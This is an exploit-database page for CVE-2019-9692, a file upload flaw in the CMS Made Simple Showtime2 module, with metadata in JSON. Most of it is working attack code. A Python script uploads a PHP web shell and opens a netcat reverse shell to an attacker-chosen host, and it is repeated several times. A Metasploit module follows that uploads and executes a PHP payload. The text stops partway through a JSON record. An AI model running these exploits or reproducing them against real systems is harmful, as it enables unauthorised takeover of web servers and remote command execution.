Search...

CMS Made Simple Showtime2 3.6.2 Arbitrary File Upload

2019-03-15T00:00:00

ID PACKETSTORM:152105
Type packetstorm
Reporter Daniele Scanu
Modified 2019-03-15T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module  
# Date: March 2019  
# Exploit Author: Daniele Scanu @ Certimeter Group  
# Vendor Homepage: https://www.cmsmadesimple.org/  
# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2  
# Version: Showtime2 module &lt;= 3.6.2  
# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04  
# CVE : 2019-9692  
  
import requests  
import optparse  
from requests_toolbelt.multipart.encoder import MultipartEncoder  
  
parser = optparse.OptionParser()  
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://192.168.1.10/cms)")  
parser.add_option('-U', '--username', action="store", dest="username", help="Username for login", default="admin")  
parser.add_option('-P', '--password', action="store", dest="password", help="Password for login", default="password")  
parser.add_option('-l', '--local', action="store", dest="local", help="Local uri for reverse shell", default="localhost")  
parser.add_option('-p', '--port', action="store", dest="port", help="Local port for reverse shell", default="2222")  
options, args = parser.parse_args()  
  
if not options.url:  
print "[-] Specify an uri target"  
exit()  
  
if not options.username:  
print "[-] Specify an username for login in administrator panel"  
exit()  
  
if not options.password:  
print "[-] Specify a password for login in administrator panel"  
exit()  
  
base_uri = options.url  
url_login = base_uri + "/admin/login.php"  
user = options.username  
password = options.password  
session = requests.Session()  
__c_var = ""  
lhost = options.local  
lport = options.port  
  
# Login in administrator panel for get the csrf token  
def login(username, password):  
print "[*] Login to cms"  
global __c_var  
credentials = {"username": username, "password": password, "loginsubmit": "Submit"}  
response = session.post(url_login, data=credentials, allow_redirects=False)  
__c_var = response.headers['Location'].split("__c=")[1]  
print "[*] Token value: " + __c_var  
  
# upload a php script with reverse shell in vulnerable functionality  
def upload_shell():  
print "[*] Uploading webshell"  
multipart_data = MultipartEncoder(  
fields = {  
'm1_input_browse': ('shell.php', "&lt;?php system($_REQUEST['cmd']); ?&gt;", 'text/plain'),  
'__c': __c_var,  
'mact': 'Showtime2,m1_,defaultadmin,0',  
'm1_upload_submit': 'Upload'  
}  
)  
response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,  
headers={'Content-Type': multipart_data.content_type})  
  
# Call the script uploaded for spawn a reverse shell  
def spawn_shell():  
print "[*] Spawn a shell to " + lhost + ":" + str(lport)  
payload = {"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&1|nc " + lhost + " " + str(lport) + " &gt;/tmp/f"}  
requests.post(base_uri + "/uploads/images/shell.php", data=payload)  
  
login(user, password)  
upload_shell()  
spawn_shell()  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:152105", "type": "packetstorm", "bulletinFamily": "exploit", "title": "CMS Made Simple Showtime2 3.6.2 Arbitrary File Upload", "description": "", "published": "2019-03-15T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://packetstormsecurity.com/files/152105/CMS-Made-Simple-Showtime2-3.6.2-Arbitrary-File-Upload.html", "reporter": "Daniele Scanu", "references": [], "cvelist": ["CVE-2019-9692"], "lastseen": "2019-03-16T11:22:05", "viewCount": 55, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:EE71C50D-5A60-4738-908D-A92A3ADB937D"]}, {"type": "cve", "idList": ["CVE-2019-9692"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/CMSMS_SHOWTIME2_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113353"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152269"]}, {"type": "zdt", "idList": ["1337DAY-ID-32361", "1337DAY-ID-32435"]}], "rev": 4}, "score": {"value": 6.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:EE71C50D-5A60-4738-908D-A92A3ADB937D"]}, {"type": "cve", "idList": ["CVE-2019-9692"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/CMSMS_SHOWTIME2_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113353"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152269"]}, {"type": "zdt", "idList": ["1337DAY-ID-32361", "1337DAY-ID-32435"]}]}, "exploitation": null, "vulnersScore": 6.1}, "sourceHref": "https://packetstormsecurity.com/files/download/152105/cmsmsshowtime2-upload.txt", "sourceData": "`#!/usr/bin/env python \n# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module \n# Date: March 2019 \n# Exploit Author: Daniele Scanu @ Certimeter Group \n# Vendor Homepage: https://www.cmsmadesimple.org/ \n# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2 \n# Version: Showtime2 module <= 3.6.2 \n# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04 \n# CVE : 2019-9692 \n \nimport requests \nimport optparse \nfrom requests_toolbelt.multipart.encoder import MultipartEncoder \n \nparser = optparse.OptionParser() \nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target uri (ex. http://192.168.1.10/cms)\") \nparser.add_option('-U', '--username', action=\"store\", dest=\"username\", help=\"Username for login\", default=\"admin\") \nparser.add_option('-P', '--password', action=\"store\", dest=\"password\", help=\"Password for login\", default=\"password\") \nparser.add_option('-l', '--local', action=\"store\", dest=\"local\", help=\"Local uri for reverse shell\", default=\"localhost\") \nparser.add_option('-p', '--port', action=\"store\", dest=\"port\", help=\"Local port for reverse shell\", default=\"2222\") \noptions, args = parser.parse_args() \n \nif not options.url: \nprint \"[-] Specify an uri target\" \nexit() \n \nif not options.username: \nprint \"[-] Specify an username for login in administrator panel\" \nexit() \n \nif not options.password: \nprint \"[-] Specify a password for login in administrator panel\" \nexit() \n \nbase_uri = options.url \nurl_login = base_uri + \"/admin/login.php\" \nuser = options.username \npassword = options.password \nsession = requests.Session() \n__c_var = \"\" \nlhost = options.local \nlport = options.port \n \n# Login in administrator panel for get the csrf token \ndef login(username, password): \nprint \"[*] Login to cms\" \nglobal __c_var \ncredentials = {\"username\": username, \"password\": password, \"loginsubmit\": \"Submit\"} \nresponse = session.post(url_login, data=credentials, allow_redirects=False) \n__c_var = response.headers['Location'].split(\"__c=\")[1] \nprint \"[*] Token value: \" + __c_var \n \n# upload a php script with reverse shell in vulnerable functionality \ndef upload_shell(): \nprint \"[*] Uploading webshell\" \nmultipart_data = MultipartEncoder( \nfields = { \n'm1_input_browse': ('shell.php', \"<?php system($_REQUEST['cmd']); ?>\", 'text/plain'), \n'__c': __c_var, \n'mact': 'Showtime2,m1_,defaultadmin,0', \n'm1_upload_submit': 'Upload' \n} \n) \nresponse = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data, \nheaders={'Content-Type': multipart_data.content_type}) \n \n# Call the script uploaded for spawn a reverse shell \ndef spawn_shell(): \nprint \"[*] Spawn a shell to \" + lhost + \":\" + str(lport) \npayload = {\"cmd\": \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc \" + lhost + \" \" + str(lport) + \" >/tmp/f\"} \nrequests.post(base_uri + \"/uploads/images/shell.php\", data=payload) \n \nlogin(user, password) \nupload_shell() \nspawn_shell() \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645545071}}

{"cve": [{"lastseen": "2022-03-24T01:05:40", "description": "class.showtime2_image.php in CMS Made Simple (CMSMS) before 2.2.10 does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-03-11T18:29:00", "type": "cve", "title": "CVE-2019-9692", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9692"], "modified": "2019-04-02T18:42:00", "cpe": [], "id": "CVE-2019-9692", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9692", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2021-12-02T09:29:04", "description": "This Metasploit module exploits a file upload vulnerability that allows for remote command execution in Showtime2 module versions 3.6.2 and below in CMS Made Simple (CMSMS). An authenticated user with \"Use Showtime2\" privilege could exploit the vulnerability. The vulnerability exists in the Showtime2 module, where the class \"class.showtime2_image.php\" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG). Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-03-27T00:00:00", "type": "zdt", "title": "CMS Made Simple (CMSMS) Showtime2 File Upload Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9692"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32435", "href": "https://0day.today/exploit/description/32435", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"CMS Made Simple (CMSMS) Showtime2 File Upload RCE\",\n 'Description' => %q(\n This module exploits a File Upload vulnerability that lead in a RCE in\n Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated\n user with \"Use Showtime2\" privilege could exploit the vulnerability.\n\n The vulnerability exists in the Showtime2 module, where the class\n \"class.showtime2_image.php\" does not ensure that a watermark file\n has a standard image file extension (GIF, JPG, JPEG, or PNG).\n\n Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,\n 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniele Scanu', # Discovery & PoC\n 'Fabio Cogno' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2019-9692'],\n ['CWE', '434'],\n ['EDB', '46546'],\n ['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],\n ['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Automatic', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => \"Mar 11 2019\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, \"Base CMS Made Simple directory path\", '/']),\n OptString.new('USERNAME', [true, \"Username to authenticate with\", '']),\n OptString.new('PASSWORD', [false, \"Password to authenticate with\", ''])\n ]\n )\n end\n\n def do_login\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),\n 'vars_post' => {\n 'username' => datastore['username'],\n 'password' => datastore['password'],\n 'loginsubmit' => 'Submit'\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Connection failed')\n end\n\n if res.code == 302\n @csrf_name = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-2].to_s\n @csrf_value = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-1].to_s\n @cookies = res.get_cookies\n return\n end\n\n fail_with(Failure::NoAccess, 'Authentication was unsuccessful')\n end\n\n def upload(fname, fcontent)\n # construct POST data\n data = Rex::MIME::Message.new\n data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, \"form-data; name=\\\"mact\\\"\")\n data.add_part('Upload', nil, nil, \"form-data; name=\\\"m1_upload_submit\\\"\")\n data.add_part(@csrf_value, nil, nil, \"form-data; name=\\\"#{@csrf_name}\\\"\")\n data.add_part(fcontent, 'text/plain', nil, \"from-data; name=\\\"m1_input_browse\\\"; filename=\\\"#{fname}\\\"\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s,\n 'headers' => {\n 'Cookie' => @cookies\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Connection failed')\n end\n\n if res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id=\"showoverview\"/i)\n return\n end\n\n print_warning('No confidence in PHP payload success or failure')\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini')\n )\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Unknown\n end\n\n if res.code == 200\n module_version = Gem::Version.new(res.body.scan(/^version = \"?(\\d\\.\\d\\.\\d)\"?/).flatten.first)\n if module_version < Gem::Version.new('3.6.3')\n # Showtime2 module is uploaded and present on \"Module Manager\" section but it could be NOT installed.\n vprint_status(\"Showtime2 version: #{module_version}\")\n return Exploit::CheckCode::Appears\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n unless Exploit::CheckCode::Appears == check\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\n end\n\n @csrf_name = nil\n @csrf_value = nil\n @cookies = nil\n\n do_login\n\n # Upload PHP payload\n fname = \"#{rand_text_alphanumeric(3..9)}.php\"\n fcontent = \"<?php #{payload.encode} ?>\"\n print_status('Uploading PHP payload.')\n upload(fname, fcontent)\n\n # Register uploaded PHP payload file for cleanup\n register_files_for_cleanup('./' + fname)\n\n # Retrieve and execute PHP payload\n print_status(\"Making request for '/#{fname}' to execute payload.\")\n send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname)\n },\n 15\n )\n end\nend\n", "sourceHref": "https://0day.today/exploit/32435", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-03-16T16:42:38", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2019-03-15T00:00:00", "type": "zdt", "title": "CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-9692"], "modified": "2019-03-15T00:00:00", "id": "1337DAY-ID-32361", "href": "https://0day.today/exploit/description/32361", "sourceData": "#!/usr/bin/env python\r\n# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module\r\n# Exploit Author: Daniele Scanu @ Certimeter Group\r\n# Vendor Homepage: https://www.cmsmadesimple.org/\r\n# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2\r\n# Version: Showtime2 module <= 3.6.2\r\n# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04\r\n# CVE : 2019-9692\r\n\r\nimport requests\r\nimport optparse\r\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\r\n\r\nparser = optparse.OptionParser()\r\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target uri (ex. http://192.168.1.10/cms)\")\r\nparser.add_option('-U', '--username', action=\"store\", dest=\"username\", help=\"Username for login\", default=\"admin\")\r\nparser.add_option('-P', '--password', action=\"store\", dest=\"password\", help=\"Password for login\", default=\"password\")\r\nparser.add_option('-l', '--local', action=\"store\", dest=\"local\", help=\"Local uri for reverse shell\", default=\"localhost\")\r\nparser.add_option('-p', '--port', action=\"store\", dest=\"port\", help=\"Local port for reverse shell\", default=\"2222\")\r\noptions, args = parser.parse_args()\r\n\r\nif not options.url:\r\n print \"[-] Specify an uri target\"\r\n exit()\r\n\r\nif not options.username:\r\n print \"[-] Specify an username for login in administrator panel\"\r\n exit()\r\n\r\nif not options.password:\r\n print \"[-] Specify a password for login in administrator panel\"\r\n exit()\r\n\r\nbase_uri = options.url\r\nurl_login = base_uri + \"/admin/login.php\"\r\nuser = options.username\r\npassword = options.password\r\nsession = requests.Session()\r\n__c_var = \"\"\r\nlhost = options.local\r\nlport = options.port\r\n\r\n# Login in administrator panel for get the csrf token\r\ndef login(username, password):\r\n print \"[*] Login to cms\"\r\n global __c_var\r\n credentials = {\"username\": username, \"password\": password, \"loginsubmit\": \"Submit\"}\r\n response = session.post(url_login, data=credentials, allow_redirects=False)\r\n __c_var = response.headers['Location'].split(\"__c=\")[1]\r\n print \"[*] Token value: \" + __c_var\r\n\r\n# upload a php script with reverse shell in vulnerable functionality\r\ndef upload_shell():\r\n print \"[*] Uploading webshell\"\r\n multipart_data = MultipartEncoder(\r\n fields = {\r\n 'm1_input_browse': ('shell.php', \"<?php system($_REQUEST['cmd']); ?>\", 'text/plain'),\r\n '__c': __c_var,\r\n 'mact': 'Showtime2,m1_,defaultadmin,0',\r\n 'm1_upload_submit': 'Upload'\r\n }\r\n )\r\n response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,\r\n headers={'Content-Type': multipart_data.content_type})\r\n\r\n# Call the script uploaded for spawn a reverse shell\r\ndef spawn_shell():\r\n print \"[*] Spawn a shell to \" + lhost + \":\" + str(lport)\r\n payload = {\"cmd\": \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc \" + lhost + \" \" + str(lport) + \" >/tmp/f\"}\r\n requests.post(base_uri + \"/uploads/images/shell.php\", data=payload)\r\n\r\nlogin(user, password)\r\nupload_shell()\r\nspawn_shell()\n\n# 0day.today [2019-03-16] #", "sourceHref": "https://0day.today/exploit/32361", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "metasploit": [{"lastseen": "2020-10-14T19:10:07", "description": "This module exploits a File Upload vulnerability that lead in a RCE in Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with \"Use Showtime2\" privilege could exploit the vulnerability. The vulnerability exists in the Showtime2 module, where the class \"class.showtime2_image.php\" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG). Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-03-19T22:48:46", "type": "metasploit", "title": "CMS Made Simple (CMSMS) Showtime2 File Upload RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9692"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/CMSMS_SHOWTIME2_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"CMS Made Simple (CMSMS) Showtime2 File Upload RCE\",\n 'Description' => %q(\n This module exploits a File Upload vulnerability that lead in a RCE in\n Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated\n user with \"Use Showtime2\" privilege could exploit the vulnerability.\n\n The vulnerability exists in the Showtime2 module, where the class\n \"class.showtime2_image.php\" does not ensure that a watermark file\n has a standard image file extension (GIF, JPG, JPEG, or PNG).\n\n Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,\n 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniele Scanu', # Discovery & PoC\n 'Fabio Cogno' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2019-9692'],\n ['CWE', '434'],\n ['EDB', '46546'],\n ['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],\n ['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Automatic', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => '2019-03-11',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, \"Base CMS Made Simple directory path\", '/']),\n OptString.new('USERNAME', [true, \"Username to authenticate with\", '']),\n OptString.new('PASSWORD', [false, \"Password to authenticate with\", ''])\n ]\n )\n end\n\n def do_login\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),\n 'vars_post' => {\n 'username' => datastore['username'],\n 'password' => datastore['password'],\n 'loginsubmit' => 'Submit'\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Connection failed')\n end\n\n if res.code == 302\n @csrf_name = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-2].to_s\n @csrf_value = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-1].to_s\n @cookies = res.get_cookies\n return\n end\n\n fail_with(Failure::NoAccess, 'Authentication was unsuccessful')\n end\n\n def upload(fname, fcontent)\n # construct POST data\n data = Rex::MIME::Message.new\n data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, \"form-data; name=\\\"mact\\\"\")\n data.add_part('Upload', nil, nil, \"form-data; name=\\\"m1_upload_submit\\\"\")\n data.add_part(@csrf_value, nil, nil, \"form-data; name=\\\"#{@csrf_name}\\\"\")\n data.add_part(fcontent, 'text/plain', nil, \"from-data; name=\\\"m1_input_browse\\\"; filename=\\\"#{fname}\\\"\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s,\n 'headers' => {\n 'Cookie' => @cookies\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Connection failed')\n end\n\n if res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id=\"showoverview\"/i)\n return\n end\n\n print_warning('No confidence in PHP payload success or failure')\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini')\n )\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Unknown\n end\n\n if res.code == 200\n module_version = Gem::Version.new(res.body.scan(/^version = \"?(\\d\\.\\d\\.\\d)\"?/).flatten.first)\n if module_version < Gem::Version.new('3.6.3')\n # Showtime2 module is uploaded and present on \"Module Manager\" section but it could be NOT installed.\n vprint_status(\"Showtime2 version: #{module_version}\")\n return Exploit::CheckCode::Appears\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n unless Exploit::CheckCode::Appears == check\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\n end\n\n @csrf_name = nil\n @csrf_value = nil\n @cookies = nil\n\n do_login\n\n # Upload PHP payload\n fname = \"#{rand_text_alphanumeric(3..9)}.php\"\n fcontent = \"<?php #{payload.encode} ?>\"\n print_status('Uploading PHP payload.')\n upload(fname, fcontent)\n\n # Register uploaded PHP payload file for cleanup\n register_files_for_cleanup('./' + fname)\n\n # Retrieve and execute PHP payload\n print_status(\"Making request for '/#{fname}' to execute payload.\")\n send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname)\n },\n 15\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/cmsms_showtime2_rce.rb", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2019-03-28T22:53:28", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "CMS Made Simple (CMSMS) Showtime2 File Upload Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-9692"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152269", "href": "https://packetstormsecurity.com/files/152269/CMS-Made-Simple-CMSMS-Showtime2-File-Upload-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => \"CMS Made Simple (CMSMS) Showtime2 File Upload RCE\", \n'Description' => %q( \nThis module exploits a File Upload vulnerability that lead in a RCE in \nShowtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated \nuser with \"Use Showtime2\" privilege could exploit the vulnerability. \n \nThe vulnerability exists in the Showtime2 module, where the class \n\"class.showtime2_image.php\" does not ensure that a watermark file \nhas a standard image file extension (GIF, JPG, JPEG, or PNG). \n \nTested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, \n3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1 \n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Daniele Scanu', # Discovery & PoC \n'Fabio Cogno' # Metasploit module \n], \n'References' => \n[ \n['CVE', '2019-9692'], \n['CWE', '434'], \n['EDB', '46546'], \n['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'], \n['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47'] \n], \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => [['Automatic', {}]], \n'Privileged' => false, \n'DisclosureDate' => \"Mar 11 2019\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, \"Base CMS Made Simple directory path\", '/']), \nOptString.new('USERNAME', [true, \"Username to authenticate with\", '']), \nOptString.new('PASSWORD', [false, \"Password to authenticate with\", '']) \n] \n) \nend \n \ndef do_login \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'), \n'vars_post' => { \n'username' => datastore['username'], \n'password' => datastore['password'], 